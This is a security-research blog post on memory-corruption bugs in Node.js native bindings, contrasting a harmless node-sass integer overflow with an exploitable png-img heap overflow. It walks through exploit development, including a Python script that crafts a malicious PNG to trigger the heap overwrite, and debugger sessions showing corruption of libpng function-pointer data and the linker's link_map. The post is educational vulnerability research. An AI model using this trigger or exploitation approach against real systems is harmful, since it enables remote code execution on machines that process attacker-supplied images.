skip to content
Back to GitHub.com
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
December 7, 2020

Now you C me, now you don't, part two: exploiting the in-between

Bas Alberts

In the first installment of this series on the native attack surface of interpreted languages, we learned that even in core implementations of interpreted languages such as Javascript, Python and Perl, memory safety is not always a guarantee.

In this second installment we’ll take a deeper dive into how vulnerabilities may be introduced when glueing C/C++ based libraries into interpreted languages through a Foreign Function Interface (FFI). As we discussed previously, an FFI is an interface between code written in two different languages. For example, making a C based library available for use in a Javascript program.

The FFI is responsible for translating objects from language A into something that language B can work with, and vice versa. To facilitate this translation, a developer has to write language API specific code that enables the back and forth between the two languages. This is often also referred to as writing language bindings.

From an attacker viewpoint, foreign language bindings represent an interesting attack surface. When dealing with an FFI that translates from a memory safe language into a memory unsafe language such as C/C++, there exists the potential for developers to introduce memory safety bugs.

Even when the higher level language is considered memory safe, and even when the targeted foreign code has received considerable security scrutiny, there may lurk exploitable vulnerabilities in the in-between; the code that bridges the gap between the two languages.

In this post we’re going to take a closer look at two such bugs and we’ll take a step by step journey through how an attacker evaluates exploitability of your code. The aim is to provide you with a high level understanding of the exploit development process, not just for a specific case, but from a conceptual perspective as well. By understanding how an exploit developer thinks about your code, you’ll be able to build defensive programming habits that will help you write more secure code.

For our case study we’re going to compare and contrast two bugs that look similar, yet one is just a bug while the other is a vulnerability. Both existed in C/C++ bindings for Node.js packages.

node-sass

Node-sass provides Node.js bindings to LibSass, which is a C implementation of the Sass stylesheet preprocessor. While node-sass was recently deprecated, it still receives some 5 million+ downloads a week from the NPM package registry so it makes for a potentially interesting audit surface.

When reading the node-sass bindings we note the following code pattern:

 int indent_len = Nan::To<int32_t>(
    Nan::Get(
        options,
        Nan::New("indentWidth").ToLocalChecked()
    ).ToLocalChecked()).FromJust();


[1]
  ctx_w->indent = (char*)malloc(indent_len + 1);


  strcpy(ctx_w->indent, std::string(
[2]
    indent_len,
    Nan::To<int32_t>(
        Nan::Get(
            options,
            Nan::New("indentType").ToLocalChecked()
        ).ToLocalChecked()).FromJust() == 1 ? '\t' : ' '

At [1] we note that a user input controlled 32bit integer value is used to allocate memory. If this user supplied integer can be -1, the integer arithmetic expression indent_len + 1 would result in 0. At [2] the original negative value is then used to create a tab or space string of indent_len characters, in which the negative indent_len value becomes a rather large positive value as the std::string constructor expects to receive an unsigned length parameter of type size_t.

At the JS API level we note indentWidth is retrieved as follows:

/**
 * Get indent width
 *
 * @param {Object} options
 * @api private
 */


function getIndentWidth(options) {
  var width = parseInt(options.indentWidth) || 2;


  return width > 10 ? 2 : width;
}

The intent here is to ensure indentWidth is >= 2 or <= 10, but only the upper bound is actually checked and parseInt allows us to supply a negative value, e.g.:

var sass = require('node-sass')
var result = sass.renderSync({
        data: `h1 { font-size: 40px; }`,
        indentWidth: -1
});

This will trigger an integer overwrap, which results in an underallocation and potentially subsequent memory corruption.

To remediate this, node-sass should ensure that both the lower and upper bounds of the user supplied indentWidth value are checked before handing this value off to the lower level binding.

Sanity checking your inputs and explicitly limiting their value ranges to what makes sense for the logic of your program will serve you well as a general defensive programming habit.

So let’s recap. What is the bug pattern here? An integer overflow, resulting in heap underallocation, followed by a memory population that may corrupt adjacent heap memory. That certainly sounds CVE worthy doesn’t it?

However, while this integer overflow does lead to an underallocation of heap memory, this bug does not represent a vulnerability as this stylesheet input is most likely not attacker controlled and a std::string exception will occur before any heap corruption happens. Even if heap corruption were to occur, it would be a very limited-control overwrite with either tab or space characters based on a very large indent_len with a low likelihood of practical exploitability.

anticomputer@dc1:~$ node sass.js
terminate called after throwing an instance of 'std::length_error'
  what():  basic_string::_S_create
Aborted (core dumped)

Conclusion: just a bug.

For a bug like this to be interesting to an attacker, the attacker needs a foothold of influence on the input that triggers the bug. In this case it’s not very likely that anyone is providing attacker controlled input to the node-sass bindings. The memory corruption primitive itself would also be very limited in control. While there do exist scenarios in which even very limited heap corruption is sufficient to fully exploit a bug, generally an attacker is looking for some level of control over what the memory is corrupted with or, bar that, how much of the memory is overwritten. Preferably both.

In this case, even if the std::string constructor was not bailing out, the attacker would have to somehow craft a very large overwrite with space or tab characters into control of the process. While this is not entirely impossible, given sufficient influence and control of the surrounding memory layout, it is also not very likely.

In these kinds of scenarios we can usually apply a simple exploitability “smell test” by answering the following three questions:

  1. How does the attacker trigger the bug?
  2. What data does the attacker control and to which extent?
  3. Which algorithms are influenced by the attacker control?

Beyond that, exploitability is mostly a function of attacker goals, experience, and resources. None of which you necessarily have any insight into. Unless you spend a lot of time actually writing exploits (and even when you do), it can be very hard to exhaustively determine whether or not something is exploitable. Especially if your code is used by other software, i.e. library code, or is a component in a much larger system. Bugs that look like just bugs in an isolated context may be vulnerabilities in the larger scheme of things.

While common sense goes a long way towards establishing exploitability, any bug that can be triggered by user controlled input (or influence) is a potential vulnerability and, where time and resources allow, it makes sense to treat them as such.

png-img

For our second case study, we’re going to examine GHSL-2020-142. This bug existed in the Node.js png-img package, which provides libpng bindings.

When loading a PNG image for processing, the png-img bindings employ the PngImg::InitStorage function to allocate the initial memory required for the user supplied PNG data.

void PngImg::InitStorage_() {
    rowPtrs_.resize(info_.height, nullptr);
[1]
    data_ = new png_byte[info_.height * info_.rowbytes];


[2]
    for(size_t i = 0; i < info_.height; ++i) {
        rowPtrs_[i] = data_ + i * info_.rowbytes;
    }
}

At [1] we observe the allocation of a png_byte array of size info_.height * info_.rowbytes. Both the height and rowbytes structure members are of type png_uint_32, which implies the integer arithmetic expression here is explicitly an unsigned 32bit integer operation.

info_.height may be directly supplied from a PNG file as a 32bit integer and info_.rowbytes is derived from the PNG data as well.

This multiplication may trigger an integer overwrap which results in an underallocation of the data_ memory region.

For example, if we set info_.height to 0x01000001 with an info_.rowbytes value of 0x100, the resulting expression would be (0x01000001 * 0x100) & 0xffffffff which wraps to a value of 0x100. As a result data_ would be underallocated as a 0x100 sized png_byte array.

Subsequently, at [2], the rowPtrs_ array will be populated with row-data pointers that point outside of the bounds of the allocated memory region since the for loop conditional operates on the original info_.height value.

Once the actual row data is read from the PNG file, any adjacent memory to the data_ region may be overwritten with attacker controlled row data up to info_.height * info_.rowbytes bytes, affording a great deal of process memory control to any would-be attacker.

Note that this overwrite may be halted early according to attacker wishes by simply not supplying sufficient amounts of row-data from the PNG itself, at which point libpng error routines would kick in. Any subsequent program logic handling the error paths would then operate on corrupted heap memory.

This most likely results in a highly controlled heap overflow in terms of both contents and size and our intuition is that this bug could be an exploitable vulnerability.

Lets answer our exploitability questions to establish whether or not this bug is interesting for an attacker to pursue.

How does the attacker trigger the bug?

This bug is triggered from an attacker supplied PNG file. The attacker has full control of any data derived from the PNG that is acted upon in the png-img bindings, bar any restrictions imposed by file format sanity checks.

Because the attacker has to rely on a malicious PNG file being loaded, we can assume that any exploitation logic will likely have to be contained within this single PNG file. This means that there is likely less opportunity for an attacker to repeatedly interact with the targeted Node.js process to e.g. establish information leaks that aid in subsequent exploitation aimed at bypassing any system level mitigations such as Address Space Layout Randomization (ASLR).

We say likely, because we can not predict how png-img is actually used. There may exist use-cases in which repeatable interactions that trigger the bug or that further aid exploitation of the bug are possible.

What data does the attacker control and to which extent?

The attacker can supply the height and rowbytes variables required for granular control of the integer arithmetic and subsequent integer wrap. The wrapped value is used to determine the final allocation size of the data_ array. They can also supply fully controlled row data from the PNG image itself which is populated into out-of-bounds memory by way of the out-of-bounds pointer values in the rowPtrs array. They have granular control over how much of this attacker supplied row data is populated into memory via early termination of the supplied row data.

In short, the attacker can overwrite any data_ adjacent heap memory with a high level of control both in terms of contents and length.

Which algorithms are influenced by the attacker control?

Since we are dealing with a heap overflow, the attacker influence extends to any algorithm that is potentially acting on the corrupted heap memory. This may involve Node.js interpreter code, system library code, and of course the bindings and any associated library code itself.

Putting on our attacker glasses

From an attacker perspective, understanding what we control, how we control it, and what we can influence is crucial for establishing exploitability. Exploitability is also affected by how and where the targeted code is actually used.

If we’re dealing with a bug in library code, this library may be used in much larger software that affords all sorts of additional interaction and influence to us as attackers. Additionally, the operating environment in which the bug is triggered is also very important. Operating systems, the hardware they run on, and their software ecosystems all have varying degrees of system level mitigations enabled across a variety of configurations. A vulnerability that may be stopped by a mitigation on one OS may be fully exploitable on another.

In the case of png-img, let’s assume the most basic attacker scenario we can imagine. A single Javascript file that requires the png-img package and then uses it to load an attacker supplied PNG file.

var fs = require('fs');
PngImg = require('png-img');
var buf = fs.readFileSync('/home/anticomputer/trigger.png');
img = new PngImg(buf);

Most modern memory corruption exploits require some sort of insight into the target process memory layout. Since we are rewriting memory, knowing where things live in the original memory layout helps us to construct alternate, yet functional, memory contents for the target process to operate on.

As attackers we hope to abuse these new memory contents to trick the algorithms acting on them to perform actions that are beneficial to us as an attacker. Generally the goal is to achieve arbitrary code or command execution, but attacker goals can range to much more esoteric behavior as well. For example, an attacker may rewrite authentication flags, weaken random number generators, or otherwise subvert security critical logic in the software. Beyond that, even just making a process unavailable can be a goal in itself and can result in unexpected security impact.

Insights into memory layouts can be established either due to a lack of memory layout mitigations, in which case we can make blind assumptions about a given target binary and its associated memory layout, or via infoleaks.

Infoleaks can be as straightforward as leaking the contents of memory through additional or repurposed bugs and as esoteric as using timing or crash based probes to establish where a certain section of process memory might exist for a given library. As a caveat, being able to use infoleaks to further an exploitation agenda generally requires repeated interaction with a targeted process.

Since in our single-shot scenario, we won’t be able to retrieve insights into the target process dynamically, we will have to rely on a combination of luck and educated guesses about where things will be located in memory at the time that we trigger our memory corruption.

First we enumerate what kind of mitigations we have to deal with for the target node binary. For this we use the checksec convenience command included in the GDB Enhanced Features (GEF) plugin.

Reading symbols from /usr/bin/node...done.
gef➤  checksec
[+] checksec for '/usr/bin/node'
Canary                        : ✓
NX                            : ✓
PIE                           : ✘
Fortify                       : ✘
RelRO                         : Full
gef➤

We can see that our target binary is not a Position Independent Executable (PIE). That means that .text and .data sections of the node executable will most likely exist in the same places in memory for every run of this specific binary on the same platform. This is very helpful in our single-shot scenario, because this knowledge gives us a hook into known locations for executable code and program data. If the node binary on our test platform had been compiled as a PIE, practical exploitation of this vulnerability in a blind (i.e. remote) single-shot scenario would be significantly frustrated due to Address Space Layout Randomization (ASLR) support extending to PIE binaries on modern Linux.

If we didn’t have something like GEF’s checksec available, we could also just use the file command. Since PIE binaries are simply Elf executables with type ET_DYN (shared object file), they will report as shared libraries, whereas non-PIE binaries are of type ET_EXEC (executable file). For example, if we compare the non-PIE Node binary to the PIE bash binary on our test platform (x86_64 Ubuntu 18.04.4LTS), we note the following:

anticomputer@dc1:~$ file /bin/bash
/bin/bash: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=12f73d7a8e226c663034529c8dd20efec22dde54, stripped


anticomputer@dc1:~$ file /usr/bin/node
/usr/bin/node: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=ee756495e98cf6163ba85e13b656883fe0066062, with debug_info, not stripped

A plan of attack

Now that we know our operating environment and which memory contents are likely known to us at the time of our exploitation attempt, we can start making decisions about which algorithms we want to subvert with our heap memory control.

In this case three potential choices come to mind, ranging from application specific to platform specific.

  1. We can attack the png-img and libpng logic operating on the corrupted heap memory
  2. We can attack the Node.js interpreter logic operating on the corrupted heap memory
  3. We can attack the system libraries operating on the corrupted heap memory

Which of the three makes the most sense for us to pursue is mostly a decision based around how much time and effort we’re willing to put into our exploitation attempt. A Proof of Concept level effort warrants taking the most convenient exploitation route available to us. To determine which route that is, we have to go live with the vulnerability and perform some dynamic analysis.

Crafting a trigger

So far we’ve theorized about a lot of things. We’ve explored the kinds of considerations we make with our attacker hat on to determine whether or not a bug is worth pursuing from an exploitation perspective. Now that we’ve decided that we want to try and exploit our png-img bug fully, it is time to start playing around with the bug itself.

First let’s distill down to a base trigger for the bug. We want to create a PNG file that will trigger the integer overwrap, cause an underallocation of the data_ array, and subsequently overwrite heap memory using our crafted PNG row data. We also have to pass some checksum sanity checks in libpng’s PNG chunk parsing in order to ensure our malicious PNG data is accepted for further processing.

PNG files are composed of a PNG signature followed by a series of PNG chunks. Chunks break down into a 4-byte chunk length, a 4-byte chunk type, a variable length chunk data, and a 4-byte CRC checksum on the chunk type and data. The first chunk in a PNG is the IHDR chunk, which among other things specifies the width and height of the image.

If we recall from the vulnerable png-img bindings code, the image height is one of the variables we need to control to trigger the integer overwrap. The other variable is the number of bytes in a row. Let’s take a look at how png-img, and subsequently libpng populate this data from our supplied PNG file.

The main entry point into loading PNG data in png-img is the PngImg::PngImg constructor, which reads as follows:

PngImg::PngImg(const char* buf, const size_t bufLen)
    : data_(nullptr)
{
    memset(&info_, 0, sizeof(info_));
    PngReadStruct rs;
    if(rs.Valid()) {
        BufPtr bufPtr = {buf, bufLen};
        png_set_read_fn(rs.pngPtr, (png_voidp)&bufPtr, readFromBuf);
[1]
        ReadInfo_(rs);


        InitStorage_();
        png_read_image(rs.pngPtr, &rowPtrs_[0]);
    }
}

At [1] this calls ReadInfo_ which is the function that actually populates most of the PNG information by way of libpng’s png_read_info function.

void PngImg::ReadInfo_(PngReadStruct& rs) {
    png_read_info(rs.pngPtr, rs.infoPtr);
    info_.width = png_get_image_width(rs.pngPtr, rs.infoPtr);
    info_.height = png_get_image_height(rs.pngPtr, rs.infoPtr);
    info_.bit_depth = png_get_bit_depth(rs.pngPtr, rs.infoPtr);
    info_.color_type = png_get_color_type(rs.pngPtr, rs.infoPtr);
    info_.interlace_type = png_get_interlace_type(rs.pngPtr, rs.infoPtr);
    info_.compression_type = png_get_compression_type(rs.pngPtr, rs.infoPtr);
    info_.filter_type = png_get_filter_type(rs.pngPtr, rs.infoPtr);
    info_.rowbytes = png_get_rowbytes(rs.pngPtr, rs.infoPtr);
    info_.pxlsize = info_.rowbytes / info_.width;
}

png_read_info will cycle through all the various PNG chunks to extract information about the PNG image, to process IHDR chunks, it calls into png_handle_IHDR.

/* Read and check the IDHR chunk */
void /* PRIVATE */
png_handle_IHDR(png_structrp png_ptr, png_inforp info_ptr, png_uint_32 length)
{
   png_byte buf[13];
   png_uint_32 width, height;
   int bit_depth, color_type, compression_type, filter_type;
   int interlace_type;


   png_debug(1, "in png_handle_IHDR");


   if (png_ptr->mode & PNG_HAVE_IHDR)
      png_chunk_error(png_ptr, "out of place");


   /* Check the length */
   if (length != 13)
      png_chunk_error(png_ptr, "invalid");


   png_ptr->mode |= PNG_HAVE_IHDR;


   png_crc_read(png_ptr, buf, 13);
   png_crc_finish(png_ptr, 0);


[1]
   width = png_get_uint_31(png_ptr, buf);
   height = png_get_uint_31(png_ptr, buf + 4);
   bit_depth = buf[8];
   color_type = buf[9];
   compression_type = buf[10];
   filter_type = buf[11];
   interlace_type = buf[12];


   /* Set internal variables */
   png_ptr->width = width;
   png_ptr->height = height;
   png_ptr->bit_depth = (png_byte)bit_depth;
   png_ptr->interlaced = (png_byte)interlace_type;
   png_ptr->color_type = (png_byte)color_type;
#ifdef PNG_MNG_FEATURES_SUPPORTED
   png_ptr->filter_type = (png_byte)filter_type;
#endif
   png_ptr->compression_type = (png_byte)compression_type;


   /* Find number of channels */
   switch (png_ptr->color_type)
   {
      default: /* invalid, png_set_IHDR calls png_error */
      case PNG_COLOR_TYPE_GRAY:
      case PNG_COLOR_TYPE_PALETTE:
         png_ptr->channels = 1;
         break;


      case PNG_COLOR_TYPE_RGB:
         png_ptr->channels = 3;
         break;


      case PNG_COLOR_TYPE_GRAY_ALPHA:
         png_ptr->channels = 2;
         break;


      case PNG_COLOR_TYPE_RGB_ALPHA:
         png_ptr->channels = 4;
         break;
   }


   /* Set up other useful info */
   png_ptr->pixel_depth = (png_byte)(png_ptr->bit_depth *
   png_ptr->channels);
[2]
   png_ptr->rowbytes = PNG_ROWBYTES(png_ptr->pixel_depth, png_ptr->width);
   png_debug1(3, "bit_depth = %d", png_ptr->bit_depth);
   png_debug1(3, "channels = %d", png_ptr->channels);
   png_debug1(3, "rowbytes = %lu", (unsigned long)png_ptr->rowbytes);
   png_set_IHDR(png_ptr, info_ptr, width, height, bit_depth,
       color_type, interlace_type, compression_type, filter_type);
}

At [1] we see it pulling the width and height integers from the IHDR chunk data and at [2] we see it derive the rowbytes value via the PNG_ROWBYTES macro, which is a simple transformation of the pixel width into the number of bytes required to represent the row according to the amount of bits a single pixel occupies. For example, for 8 bit pixels, a width of 16 pixels implies 16 rowbytes.

We also note the population of the png_ptr structure, which is a heap based libpng data structure that contains all the PNG specific data. It includes a variety of function pointers that are called when libpng is operating on our PNG data. For example, when libpng encounters an error, it will call into png_error.

PNG_FUNCTION(void,PNGAPI
png_error,(png_const_structrp png_ptr, png_const_charp error_message),
   PNG_NORETURN)
{
…
[1]
   if (png_ptr != NULL && png_ptr->error_fn != NULL)
      (*(png_ptr->error_fn))(png_constcast(png_structrp,png_ptr),
          error_message);


   /* If the custom handler doesn't exist, or if it returns,
      use the default handler, which will not return. */
   png_default_error(png_ptr, error_message);
}

At [1] we see that if the png_ptr structure has a populated error_fn function pointer field, this function pointer will be called with the png_ptr structure itself passed as its first argument.

Taking note of how our affected software interacts with the memory we may be able to control is important from an attacker perspective. In this case we’ve established that there is a heap based structure used by libpng that contains function pointers which are called when errors occur. This may be useful to us in our exploitation journey as a method of redirecting execution, so we make a note of this.

If we were to rely on corrupting the png_ptr structure, that would be an example of abusing application specific heap data.

Long story short, assuming 8 bit pixels, we can control the row bytes value as a direct derivative of the image width. So to trigger the png-img bug we just have to create a valid PNG file that contains a height and width that will trigger the integer overwrap and supply enough row data to overwrite data_ adjacent heap memory.

We can quickly mock that up using the Python Pillow library

from PIL import Image
import os
import struct
import sys
import zlib


def patch(path, offset, data):
    f = open(path, 'r+b')
    f.seek(offset)
    f.write(data)
    f.close()


trigger = 'trigger.png'
row_data = b'A' * 0x100000
width = 0x100
height = int(len(row_data)/width)


# create a template PNG with a valid height for our row_data
im = Image.frombytes("L", (width, height), row_data)
im.save(trigger, "PNG")


# patch in a wrapping size to trigger overwrap and underallocation
patch(trigger, 20, struct.pack('>L', 0x01000001))


# fix up the IHDR CRC so png_read_info doesn't freak out
f = open(trigger, 'rb')
f.seek(16)
ihdr_data = f.read(13)
f.close()
crc = zlib.crc32(ihdr_data, zlib.crc32(b'IHDR') & 0xffffffff) & 0xffffffff
patch(trigger, 29, struct.pack('>L', crc))

When we load the resulting png file using png-img we observe the following crash:

(gdb) r pngimg.js
Starting program: /usr/bin/node pngimg.js
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff6a79700 (LWP 60942)]
[New Thread 0x7ffff6278700 (LWP 60943)]
[New Thread 0x7ffff5a77700 (LWP 60944)]
[New Thread 0x7ffff5276700 (LWP 60945)]
[New Thread 0x7ffff4a75700 (LWP 60946)]
[New Thread 0x7ffff7ff6700 (LWP 60947)]


Thread 1 "node" received signal SIGSEGV, Segmentation fault.
0x00007ffff7de4e52 in _dl_fixup (l=0x271f0a0, reloc_arg=285) at ../elf/dl-runtime.c:69
69      ../elf/dl-runtime.c: No such file or directory.
(gdb) x/i$pc
=> 0x7ffff7de4e52 <_dl_fixup+18>:       mov    0x8(%rax),%rdi
(gdb) bt
#0  0x00007ffff7de4e52 in _dl_fixup (l=0x271f0a0, reloc_arg=285) at ../elf/dl-runtime.c:69
#1  0x00007ffff7dec81a in _dl_runtime_resolve_xsavec () at ../sysdeps/x86_64/dl-trampoline.h:125
#2  0x00007ffff4032e63 in png_read_row () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
#3  0x00007ffff4034899 in png_read_image ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
#4  0x00007ffff40246d8 in PngImg::PngImg(char const*, unsigned long) ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
#5  0x00007ffff401e8fa in PngImgAdapter::New(Nan::FunctionCallbackInfo<v8::Value> const&) ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
#6  0x00007ffff401e56f in Nan::imp::FunctionCallbackWrapper ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
...
(gdb) i r rax
rax            0x4141414141414141       4702111234474983745
(gdb)

We see that we crashed due to _dl_fixup operating on heap memory which was overwritten by our row data which consisted of a large amount of A bytes (0x41).

So something process critical was acting on the heap data we control, and there was a subsequent crash. We see that the last libpng function called before crashing in _dl_fixup was png_read_row.

If you recall, our initial theory for exploitation was that we would perhaps be able to corrupt the png_ptr data on the heap and then trigger an error case that resulted in libpng calling to a function pointer value we supply to png_error when it runs out of row data. But instead of crashing in png_error we crashed in _dl_fixup instead.

So what’s going on here? Well, first let’s make sure that png_read_row is in fact trying to call png_error. If we look at the disassembly for png_read_row we note the following:

   0x00007ffff4032e45 <+1173>:  lea    0x335ff(%rip),%rsi        # 0x7ffff406644b
   0x00007ffff4032e4c <+1180>:  mov    %rbx,%rdi
   0x00007ffff4032e4f <+1183>:  callq  0x7ffff401d980 <png_error@plt>
   0x00007ffff4032e54 <+1188>:  lea    0x339c5(%rip),%rsi        # 0x7ffff4066820
   0x00007ffff4032e5b <+1195>:  mov    %rbx,%rdi
   0x00007ffff4032e5e <+1198>:  callq  0x7ffff401d980 <png_error@plt>
   0x00007ffff4032e63 <+1203>:  lea    0x335fb(%rip),%rsi        # 0x7ffff4066465
   0x00007ffff4032e6a <+1210>:  mov    %rbx,%rdi
   0x00007ffff4032e6d <+1213>:  callq  0x7ffff401d980 <png_error@plt>

We note that png_error is called via the procedure linkage table. The first argument is the png_ptr structure pointer passed through the rdi register and the second argument is the error message passed through the rsi register. Let’s set a breakpoint on png_error@plt to see what gives.

(gdb) break png_error@plt
Breakpoint 1 at 0x7ffff401d980
(gdb) r pngimg.js
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/node pngimg.js
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff6a79700 (LWP 60976)]
[New Thread 0x7ffff6278700 (LWP 60977)]
[New Thread 0x7ffff5a77700 (LWP 60978)]
[New Thread 0x7ffff5276700 (LWP 60979)]
[New Thread 0x7ffff4a75700 (LWP 60980)]
[New Thread 0x7ffff7ff6700 (LWP 60981)]


Thread 1 "node" hit Breakpoint 1, 0x00007ffff401d980 in png_error@plt ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
(gdb) bt
#0  0x00007ffff401d980 in png_error@plt ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
#1  0x00007ffff4032e63 in png_read_row () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
…
(gdb) x/s $rsi
0x7ffff4066820: "Invalid attempt to read row data"
(gdb) x/16x $rdi
0x271f580:      0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0x271f588:      0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
(gdb)

So far so good! We are indeed attempting to call png_error with controlled png_ptr data. But why do we crash in _dl_fixup instead of gaining function pointer control?

Well, png_error is a fatal error handler. Since this is the first time png_error has been called, due to lazy linking it has not actually been resolved and relocated yet. So what’s happening is that the instructions in the Procedure Linkage Table (PLT) will try to jump to the address contained in the Global Offset Table (GOT) jump slot entry for png_error, but this address points right back into the png_error PLT entry which contains instructions that are responsible for invoking the dynamic linker’s runtime resolver.

We can step through this process to get a better handle on it.

Thread 1 "node" hit Breakpoint 1, 0x00007ffff401d980 in png_error@plt ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
1: x/i $pc
=> 0x7ffff401d980 <png_error@plt>:      jmpq   *0x256f7a(%rip)        # 0x7ffff4274900
(gdb) x/gx 0x7ffff4274900
0x7ffff4274900: 0x00007ffff401d986
(gdb) si
0x00007ffff401d986 in png_error@plt () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
1: x/i $pc
=> 0x7ffff401d986 <png_error@plt+6>:    pushq  $0x11d
(gdb) si
0x00007ffff401d98b in png_error@plt () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
1: x/i $pc
=> 0x7ffff401d98b <png_error@plt+11>:   jmpq   0x7ffff401c7a0
(gdb) si
0x00007ffff401c7a0 in ?? () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
1: x/i $pc
=> 0x7ffff401c7a0:      pushq  0x257862(%rip)        # 0x7ffff4274008
(gdb) si
0x00007ffff401c7a6 in ?? () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
1: x/i $pc
=> 0x7ffff401c7a6:      jmpq   *0x257864(%rip)        # 0x7ffff4274010
(gdb) si
_dl_runtime_resolve_xsavec () at ../sysdeps/x86_64/dl-trampoline.h:71
71      ../sysdeps/x86_64/dl-trampoline.h: No such file or directory.
1: x/i $pc
=> 0x7ffff7dec7a0 <_dl_runtime_resolve_xsavec>: push   %rbx
(gdb)


Here we see png_error@plt jump through the GOT jump slot back into an invocation of the resolver by way of the PLT. The linker is responsible for resolving and fixing up the png_error GOT jump slot so that future invocations go directly to png_error at the right location. This is how lazy linking works in a nutshell.

The fact that the png-img library is using lazy linking for on-demand symbol resolving also tells us that it only has partial Relocation Read Only (RELRO) enabled. If we recall from our earlier mitigation check on the base Node.js binary it has full RELRO enabled. When full RELRO is enabled, the GOT section for a given binary is marked read only to prevent attackers from replacing function pointer values in the GOT. Full RELRO implies that all dynamically linked functions have to be resolved and relocated by the linker at binary load time since updating the GOT at runtime will no longer be possible. This is a performance consideration, and you often see library code compiled with partial RELRO for this reason.

gef➤  checksec
[+] checksec for '/home/anticomputer/node_modules/png-img/build/Release/png_img.node'
Canary                        : ✓
NX                            : ✓
PIE                           : ✓
Fortify                       : ✓
RelRO                         : Partial
gef➤

So to recap, our base node binary is not a PIE, but has full RELRO enabled, and our target png-img library has partial RELRO. Our heap overwrite has corrupted memory that is used by the dynamic linker to resolve functions for the png-img library, and we have also overwritten the png_ptr application specific data used by the libpng code bundled with png-img. We noted that png_ptr is passed as the first argument to this previously unresolved png_error function.

So far there are two obvious routes for exploitation. We can attempt to trigger a heap layout that gets the linker data out of the way and pursue our original plan of hijacking a png_ptr function pointer, or we can attempt to subvert the dynamic linker resolver logic.

This is where things get somewhat less deterministic. Our heap layout control is based on a static PNG file that we provide to png-img. We can allocate the data_ array as a multiple of the image width, since the vulnerability allows us to trigger a 32bit integer overwrap using the width and the height of the image.

Let’s revisit the vulnerable code:

void PngImg::InitStorage_() {
    rowPtrs_.resize(info_.height, nullptr);
[1]
    data_ = new png_byte[info_.height * info_.rowbytes];


[2]
    for(size_t i = 0; i < info_.height; ++i) {
        rowPtrs_[i] = data_ + i * info_.rowbytes;
    }
}

At [1] data_ will be the size of the result of the integer overwrap, that means we can make the data_ size any multiple of rowbytes using the low word of height. E.g. if we wanted data_ to be 8 bytes, we could set rowbytes to 8 and height to ((0xffffffff/8)+1)+1 = 0x20000001.

gef➤  p/x ((0xffffffff/8)+1)+1
$2 = 0x20000001
gef➤  p/x 0x20000001 * 8
$3 = 0x8
gef➤

That means that we have a reasonable amount of control over where in the heap we park the data_ chunk by virtue of controlling its allocation size in a fairly granular manner. However, we don’t have much else in the way of control over heap allocation ordering. If we had more control over how and when allocations and deallocations occur in our target process, then we might also consider attacking the system (glibc) allocator itself. But, given our mitigation restrictions it is unlikely that we would be able to meet a reasonable threshold of exploit reliability for our PoC exploit without sufficient allocator influence. One avenue we could explore is playing around with additional PNG Chunks to massage the heap into a beneficial state prior to triggering our memory corruption, but we’ll leave that as an option if our initial exploration turns out to be a dead end.

As a developer, it is important to understand that attackers will explore vulnerabilities according to the resources and time they’re willing to invest in their exploitation. Even for a relatively straightforward vulnerability such as the png-img heap overflow, we see there is a distinct attacker calculus at play that weighs the pros and cons of various attack strategies against your code. Mitigations are considered from both a platform-specific and goal-oriented perspective.

Deciding on a final exploitation strategy

To figure out how to best position the data_ array prior to triggering our heap memory overwrite, let’s examine the state of the heap. So far we have two targets we are tentatively interested in: the png_ptr structure and the dynamic linker data that the runtime resolver is acting on.

If we examine the heap chunk that the png_ptr structure data is located in we note that it is a main arena chunk of size 0x530:

Thread 1 "node" hit Breakpoint 2, 0x00007ffff40309b4 in png_read_row () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
gef➤  i r rdi
rdi            0x2722ef0        0x2722ef0
gef➤  heap chunk $rdi
Chunk(addr=0x2722ef0, size=0x530, flags=PREV_INUSE)
Chunk size: 1328 (0x530)
Usable size: 1320 (0x528)
Previous chunk size: 25956 (0x6564)
PREV_INUSE flag: On
IS_MMAPPED flag: Off
NON_MAIN_ARENA flag: Off


gef➤

We’ve already examined the png_ptr structure and how it might be used to subvert the node process, let’s now take a closer look at what’s going on with _dl_fixup and exactly why we’re crashing in the resolver code.

When we trigger our crash, we note the following:

0x00007ffff7de2fb2 in _dl_fixup (l=0x2722a10, reloc_arg=0x11d) at ../elf/dl-runtime.c:69
69        const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);
gef➤  p *l
$5 = {
  l_addr = 0x4141414141414141,
...
  l_info = {0x4141414141414141 <repeats 76 times>},
...
}
gef➤  p l
$6 = (struct link_map *) 0x2722a10
gef➤

What this means is that we’ve corrupted the linkmap used to resolve functions for the png-img library. The linkmap is a data structure that contains all the information the dynamic linker needs to be able to perform runtime resolving and relocation.

If we take a look at the linkmap heap chunk and data structure prior to any corruption it looks as follows:

gef➤  heap chunk 0x2722a10
Chunk(addr=0x2722a10, size=0x4e0, flags=PREV_INUSE)
Chunk size: 1248 (0x4e0)
Usable size: 1240 (0x4d8)
Previous chunk size: 39612548531313 (0x240703e24471)
PREV_INUSE flag: On
